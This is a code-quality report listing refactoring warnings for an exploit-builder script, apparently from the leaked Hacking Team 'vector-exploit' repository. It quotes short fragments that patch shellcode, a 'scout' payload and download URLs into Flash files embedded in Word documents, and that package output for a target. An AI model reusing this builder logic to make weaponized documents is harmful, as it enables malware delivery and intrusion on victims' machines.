hackedteam/vector-exploit

ht-2013-002-Word/exploit.py

Summary

Maintainability: F (1 wk)

Function create_doc has 29 lines of code (exceeds 25 allowed). Consider refactoring.
Open

def create_doc():
    # unpack zip file
    if not os.path.exists("tmp"):
        os.mkdir("tmp")

Severity: Minor
Found in ht-2013-002-Word/exploit.py - About 1 hr to fix

    Function create_doc has a Cognitive Complexity of 7 (exceeds 5 allowed). Consider refactoring.
    Open

    def create_doc():
        # unpack zip file
        if not os.path.exists("tmp"):
            os.mkdir("tmp")
    
    
    Severity: Minor
    Found in ht-2013-002-Word/exploit.py - About 35 mins to fix

    Cognitive Complexity

    Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.

    A method's cognitive complexity is based on a few simple rules:

    • Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
    • Code is considered more complex for each "break in the linear flow of the code"
    • Code is considered more complex when "flow breaking structures are nested"

    Identical blocks of code found in 2 locations. Consider refactoring.
    Open

    def create_doc():
        # unpack zip file
        if not os.path.exists("tmp"):
            os.mkdir("tmp")
    
    
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 1 other location - About 4 days to fix
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 88..144

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 489.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Identical blocks of code found in 4 locations. Consider refactoring.
    Open

    def four_byte_xor(buf, key):
        out = ''
        for i in range(0,len(buf)/4):
            c = struct.unpack("<I", buf[(i*4):(i*4)+4])[0]
            c ^= key
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 1 day to fix
    ht-2013-003-Powerpoint/exploit.py on lines 24..36
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 24..36
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 24..36

    This issue has a mass of 186.

    Identical blocks of code found in 2 locations. Consider refactoring.
    Open

    for i in range(len(ole_link_bytearray)):
        if i == ole_link_offt or i == ole_link2_offt or i == ole_link3_offt:
            y = 0
            for x in range(len(swf_url_bytearray)):
                ole_link_bytearray[i+y] = swf_url_bytearray[x]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 1 other location - About 7 hrs to fix
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 240..246

    This issue has a mass of 114.

    Identical blocks of code found in 4 locations. Consider refactoring.
    Open

    if sys.argv[2][-1] == "/":
        EXE_URL = sys.argv[2] + EXE_RANDOM_NAME
        SWF_URL = sys.argv[2] + SWF_RANDOM_NAME
    else:
        EXE_URL = sys.argv[2] + '/' + EXE_RANDOM_NAME
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 7 hrs to fix
    ht-2013-003-Powerpoint/exploit.py on lines 45..50
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 41..46
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 41..46

    This issue has a mass of 113.

    Identical blocks of code found in 3 locations. Consider refactoring.
    Open

    def byteArray2String(param):
        with warnings.catch_warnings():
                warnings.simplefilter('ignore')
                tmp = os.tempnam()
    
    
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 2 other locations - About 7 hrs to fix
    ht-2013-003-Powerpoint/exploit.py on lines 80..98
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 71..89

    This issue has a mass of 112.

    Identical blocks of code found in 4 locations. Consider refactoring.
    Open

    def random_id(length):
        number = '0123456789'
        alpha = 'abcdefghijklmnopqrstuvwxyz'
        id = ''
        for i in range(0,length,2):
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 3 hrs to fix
    ht-2013-003-Powerpoint/exploit.py on lines 15..22
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 15..22
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 15..22

    This issue has a mass of 62.

    Similar blocks of code found in 4 locations. Consider refactoring.
    Open

    if SWF_URL[:4] != 'http' and SWF_URL[:4] != "HTTP":
        SWF_URL = "http://" + SWF_URL
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 52..53
    ht-2013-003-Powerpoint/exploit.py on lines 52..53
    ht-2013-003-Powerpoint/exploit.py on lines 54..55

    This issue has a mass of 44.

    Similar blocks of code found in 4 locations. Consider refactoring.
    Open

    if EXE_URL[:4] != 'http' and EXE_URL[:4] != "HTTP":
        EXE_URL = "http://" + EXE_URL
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 54..55
    ht-2013-003-Powerpoint/exploit.py on lines 52..53
    ht-2013-003-Powerpoint/exploit.py on lines 54..55

    This issue has a mass of 44.

    Similar blocks of code found in 12 locations. Consider refactoring.
    Open

    for i in range(len(hex_url)):
        swf_bytearray[stage2_offset + URL_OFFT + i] = hex_url[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 11 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 206..207
    ht-2013-002-Word/exploit.py on lines 242..243
    ht-2013-002-Word/exploit.py on lines 248..249
    ht-2013-003-Powerpoint/exploit.py on lines 214..215
    ht-2013-003-Powerpoint/exploit.py on lines 220..221
    ht-2013-003-Powerpoint/exploit.py on lines 255..256
    ht-2013-003-Powerpoint/exploit.py on lines 261..262
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 185..186
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 192..193
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 198..199
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 204..205

    This issue has a mass of 43.

    Similar blocks of code found in 12 locations. Consider refactoring.
    Open

    for i in range(len(hex_scout)):
        swf_bytearray[stage2_offset + SCOUT_OFFT + i] = hex_scout[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 11 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 200..201
    ht-2013-002-Word/exploit.py on lines 242..243
    ht-2013-002-Word/exploit.py on lines 248..249
    ht-2013-003-Powerpoint/exploit.py on lines 214..215
    ht-2013-003-Powerpoint/exploit.py on lines 220..221
    ht-2013-003-Powerpoint/exploit.py on lines 255..256
    ht-2013-003-Powerpoint/exploit.py on lines 261..262
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 185..186
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 192..193
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 198..199
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 204..205

    This issue has a mass of 43.

    Similar blocks of code found in 12 locations. Consider refactoring.
    Open

    for i in range(len(hex_scout)):
        swf_bytearray[stage264_offset + SCOUT_OFFT64 + i] = hex_scout[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 11 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 200..201
    ht-2013-002-Word/exploit.py on lines 206..207
    ht-2013-002-Word/exploit.py on lines 242..243
    ht-2013-003-Powerpoint/exploit.py on lines 214..215
    ht-2013-003-Powerpoint/exploit.py on lines 220..221
    ht-2013-003-Powerpoint/exploit.py on lines 255..256
    ht-2013-003-Powerpoint/exploit.py on lines 261..262
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 185..186
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 192..193
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 198..199
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 204..205

    This issue has a mass of 43.

    Similar blocks of code found in 12 locations. Consider refactoring.
    Open

    for i in range(len(hex_url)):
        swf_bytearray[stage264_offset + URL_OFFT64 + i] = hex_url[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 11 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 200..201
    ht-2013-002-Word/exploit.py on lines 206..207
    ht-2013-002-Word/exploit.py on lines 248..249
    ht-2013-003-Powerpoint/exploit.py on lines 214..215
    ht-2013-003-Powerpoint/exploit.py on lines 220..221
    ht-2013-003-Powerpoint/exploit.py on lines 255..256
    ht-2013-003-Powerpoint/exploit.py on lines 261..262
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 185..186
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 192..193
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 198..199
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 204..205

    This issue has a mass of 43.

    Identical blocks of code found in 2 locations. Consider refactoring.
    Open

    if len(shellcode64) > (5800*2):
           print "[!!] Shellcode too big: 0x%x" % (len(shellcode64))
           sys.exit(-1)
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 1 other location - About 1 hr to fix
    ht-2013-003-Powerpoint/exploit.py on lines 245..247

    This issue has a mass of 42.

    Similar blocks of code found in 4 locations. Consider refactoring.
    Open

    os.system("zip.exe \"" + send_to_server_zip + "\" " + EXE_RANDOM_NAME + " " + SWF_RANDOM_NAME)
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 1 hr to fix
    ht-2013-003-Powerpoint/exploit.py on lines 332..332
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 266..266
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 275..275

    This issue has a mass of 39.

    Similar blocks of code found in 6 locations. Consider refactoring.
    Open

    for i in range(len(hex_shellcode64)):
        swf_bytearray[stage264_offset + i] = hex_shellcode64[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 5 other locations - About 55 mins to fix
    ht-2013-002-Word/exploit.py on lines 193..194
    ht-2013-003-Powerpoint/exploit.py on lines 207..208
    ht-2013-003-Powerpoint/exploit.py on lines 249..250
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 178..179
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 192..193

    This issue has a mass of 37.

    Similar blocks of code found in 6 locations. Consider refactoring.
    Open

    for i in range(len(hex_shellcode)):
        swf_bytearray[stage2_offset + i] = hex_shellcode[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 5 other locations - About 55 mins to fix
    ht-2013-002-Word/exploit.py on lines 236..237
    ht-2013-003-Powerpoint/exploit.py on lines 207..208
    ht-2013-003-Powerpoint/exploit.py on lines 249..250
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 178..179
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 192..193

    This issue has a mass of 37.

    Identical blocks of code found in 2 locations. Consider refactoring.
    Open

    if not os.path.exists("c:\\RCS\\DB\\config\\test"):
        SWF_RANDOM_NAME = random_id(12) + ".swf"
    else:
        SWF_RANDOM_NAME = "avtest.swf"
    Severity: Minor
    Found in ht-2013-002-Word/exploit.py and 1 other location - About 55 mins to fix
    ht-2013-003-Powerpoint/exploit.py on lines 39..42

    This issue has a mass of 37.

    Identical blocks of code found in 4 locations. Consider refactoring.
    Open

    if len(shellcode) > 5800:
           print "[!!] Shellcode too big: 0x%x" % (len(shellcode))
           sys.exit(-1)
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 50 mins to fix
    ht-2013-003-Powerpoint/exploit.py on lines 203..205
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 173..175
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 187..189

    This issue has a mass of 36.

    Similar blocks of code found in 4 locations. Consider refactoring.
    Open

    os.system("zip.exe -r \"" + send_to_target_zip + "\" \"" + output_file + "\"")
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 35 mins to fix
    ht-2013-003-Powerpoint/exploit.py on lines 326..326
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 260..260
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 269..269

    This issue has a mass of 33.
